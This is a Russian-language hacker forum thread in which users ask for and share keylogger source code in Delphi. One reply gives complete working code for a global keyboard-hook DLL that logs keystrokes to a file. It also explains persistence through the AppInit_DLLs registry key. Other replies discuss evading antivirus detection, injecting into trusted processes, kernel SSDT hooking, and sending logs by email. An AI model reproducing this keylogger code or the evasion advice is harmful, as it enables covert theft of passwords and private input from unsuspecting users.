Форум АНТИЧАТ - [delphi] Клавиатурный шпион

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- С/С++, C#, Delphi, .NET, Asm (https://forum.antichat.xyz/forumdisplay.php?f=24)

- - [delphi] Клавиатурный шпион (https://forum.antichat.xyz/showthread.php?t=115416)

[delphi] Клавиатурный шпион

Пожалуйста помогите найти исходники хорошего келоггера на дельфи. Несколько часов голову ломаю но ничего подходящего немогу найти.А мне срочно надо

Хороший келогер(безпаливный) на дельфе ты ненапишеш ;)

http://www.delphisources.ru/pages/sources/system/2005_year/key_logger.html
http://www.realcoding.net/article/view/4321
http://pblog.ru/?p=69
http://articles.org.ru/cfaq/index.php?qid=1475&catid=50
http://sources.ru/cpp/faqs/49.htm
http://www.realcoding.net/article/view/4321

интересно, когда же вы научитесь гуглом пользоватся..

Цитата:

Сообщение от slesh

Хороший келогер(безпаливный) на дельфе ты ненапишеш ;)

это скорее проблема прямых рук, чем дельфи. да и вопрос не стоял о "безпаливности".

http://www.programmersforum.ru/showthread.php?t=5505
http://www.dore.ru/perl/nntp.pl?f=1&gid=8&mid=24390
http://forum.vingrad.ru/index.php?showtopic=76095&unread=1&hl=

з.ы. примеры без использования DLL

в книге делфи глазами хакера был кейлогер юзай гугл

2 Hellsp@wn По мне - всё что имеет видимый процесс - то паливно )
Безпаливно - это значит очень хорошо, потому как проактивки кейлогеров палят быстро.
А так хук в Shadow SDT и хороший получается адрёный хукер. Но на дельфе ты такое врядли напишешь. А так максимум что ты сможешь сделать нормального DLL которая делает всё плохую работу. А там уже методов куча и стандартные виндовые хуки на сообщения и простой сплайсинг но в любом случае - это спалится очень

ну и зачем? инжект в доверенные (способы есть) и ставь хуки какие хочешь, если это не нра ахукай SDT, мешает процесс, пусть будет шелл код. причём здесь вообще дельфи? это всё кодиться на любом языке.

Цитата:

Сообщение от Baofy

в книге делфи глазами хакера был кейлогер юзай гугл

книга у меня есть

2 Hellsp@wn

Цитата:

если это не нра ахукай SDT

Неуверен что ты сможешь на делфи похукать SDT и тем более чтобы это у тебя работало.
для непосвяшенных это делается в ring0 (kernel-mode) из драйвера. Хотя дрова писать на дельфе - это тру!

и еще пожалуйста подскажите как сделать чтобы через заданный промежуток времени программа выполняла команды,но без TTmer а.например через каждые 3 часа отправляла лог или проверяла подключен ли интернет или размер файла лога.....

Цитата:

Сообщение от slesh

2 Hellsp@wn

Неуверен что ты сможешь на делфи похукать SDT и тем более чтобы это у тебя работало.
для непосвяшенных это делается в ring0 (kernel-mode) из драйвера. Хотя дрова писать на дельфе - это тру!

после этого даже объяснять ничего не хочется. есть такая вещь, эксплоит называется. если тебе нужен мастер класс пиши в пм проведу, оффтопить хватит.

Цитата:

Сообщение от miqo

http://www.sql.ru/forum/actualthread.aspx?tid=217966

Ставь касперского 7 на полной проактивке и слушай поросячий визг от установшиков хуков )
На счет шелкода - можно поспорить. Ну вот запустил ты свою прогу, и она заинжектит куданить шелкод. Ну хотябы в тотже эксплорер (WriteProcessMemory) один инжект тебя убьет.
Ну ты еще можешь поставить через SetWindowsHookEx хук на Клаву (WH_KEYBOARD) но твоя прога должна тогда выглядеть в виде DLL которая тупо должна грузится к приложениям. А если приложения консольное, то хрен такое сработает.

А если паливность вообще закинуть куда подальше, то все средства хороши.
Тупо берем пример из DW

Код:

library Hook;

uses Windows, SysUtils;

const KF_UP_MY = $40000000;

var CurrentHook: HHook;

    KeyArray: array[0..19] of char;

    KeyArrayPtr: integer;

    CurFile:text;

function GlobalKeyBoardHook(code: integer; wParam: integer; lParam:

integer): longword; stdcall;

var

i:integer;

begin

  if code< 0 then

   begin

     result:=CallNextHookEx(CurrentHook,code,wParam,lparam);

     Exit;

   end;

  if ( (lParam and KF_UP_MY ) = 0) and (wParam> =65) and (wParam< =90) then

    begin

      KeyArray[KeyArrayPtr]:=char(wParam);

      KeyArrayPtr:=KeyArrayPtr+1;

      if KeyArrayPtr> 19 then

       begin

        for i:=0 to 19 do

        begin

          Assignfile(CurFile,'d:\log.txt');

          if fileexists('d:\log.txt')=false then rewrite(CurFile)

          else Append(CurFile);

          write(Curfile, KeyArray[i]);

          closefile(curfile);

        end;

        KeyArrayPtr:=0;

       end;

    end;

    CallNextHookEx(CurrentHook,code,wParam,lparam);

    result:=0;

end;

procedure SetupGlobalKeyBoardHook;

begin

  CurrentHook:=SetWindowsHookEx(WH_KEYBOARD, @GlobalKeyBoardHook,HInstance, 0);

  KeyArrayptr:=0;

end;

procedure unhook;

begin

  UnhookWindowshookEx(CurrentHook);

end;



exports

 SetupGlobalKeyBoardHook, UnHook;

begin

end.

И тупо прописываешь его в
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
Вот и тебе и хукер. А там уже добавить таблицу системных кнопок типа ESC и тому подобных, а также по дискриптору окна определяешь имя окна и процесса где это было вписано. Вот тебе и хороший кейлогер.

/me ушел вешаться из-за поросячих визгов товарища Касперского.

спс всем!!!

а как на счет второго вопроса?

Цитата:

Hellsp@wn инжект в доверенный процесс это уже давным довно прошлый век и палится на раз!
послушай слеша) он умный)

sboy20042 если ты не знаешь способов, это не значит что их вообще нету. или CreateRemoteThread / Set(Get)ThreadContext / QueueUserAPC это предел?

miqo
http://www.sql.ru/forum/actualthread.aspx?tid=217966

плз!!!напишите побыстрее мне очень срочно надо

miqo, тебе Hellsp@wn дал ссылку:

Цитата:

http://www.sql.ru/forum/actualthread.aspx?tid=217966

спасибо большое!!!!

C пеной у рта вы тут все доказываете... а ведь под вин есть дофига способов реализовывать кей логеры... от написания собстенного драйвера клавиатуры
до юзанья стандартных хуков (в промежутке можно кучи способов найти двигаясь от ring0 до ring3)

Самый клевый кей логгер это аппаратный кей логгер ))) встраиваемый в клаву или в штур и никаких проблем, кроссплатформенный )

Последнее время камперычи всякие и оутпосты так сидят в ядре эх

а может у кого есть исходник с описаниями на асм е.но чтоб было отправка на майл,функция скртншота и т.д.

Интересует тот же вопрос.Только мне нужно как можно меньше кода,чтобы быстро ввести и скомпилить его на паре ;) .На процессы и антивирус наплевать.Нужен код который например скрывает форму и всё введённое пишет в обычный edit ,а по нажатию какого-нибудь сочетания клавиш разварачивает форму чтобы скопировать edit...Повторюсь как можно меньше кода,на палевность наплевать.Есть предложения ? Delphi почти не знаю.

rushter, а ну такое ваще легко реализовать... стандартным хуком
ссылок уже море приводили...

вот еще: http://www.xakep.ru//magazine/xa/055/070/1.asp

а у мя идея ваще другая была
у нас экзамен был по асемблеру там задачки были
и задания задачек нам дали... типа разберайтесь балбесы на экзамен напишете

тык вот идея программы была какая
прога сидит в беграунде и по нажатии сочитаний клавишь типа alt+5
вставляет в буффер обмена исходник 5 задачи написанный дома )

ну и все в редактор его ctrl+v скомпилил показал ) ггг
но это я придумал на консольтации сидя, поэтому реализовывать было лень да и некогда и незачем, повторял - отл за экзамен получил )

http://depositfiles.com/files/3gwj16ktf
делал очень давно, года ~2 назад, когда начинал учить делфи =)
код не маленький, есть отправка на мило, авто-остановка при определенном сочетание букв..
разбирайтесь кароче, кому нужно))

Спасибо думающим людям , которые посмотрели в гугле и выложили ссылочки на исходники логеров ;
К сожалению есть вопрос , которые из всех тих ссылок освещается только в одной и только на си++

Собственно вопрос: " Как отловить класс/ id окна ?"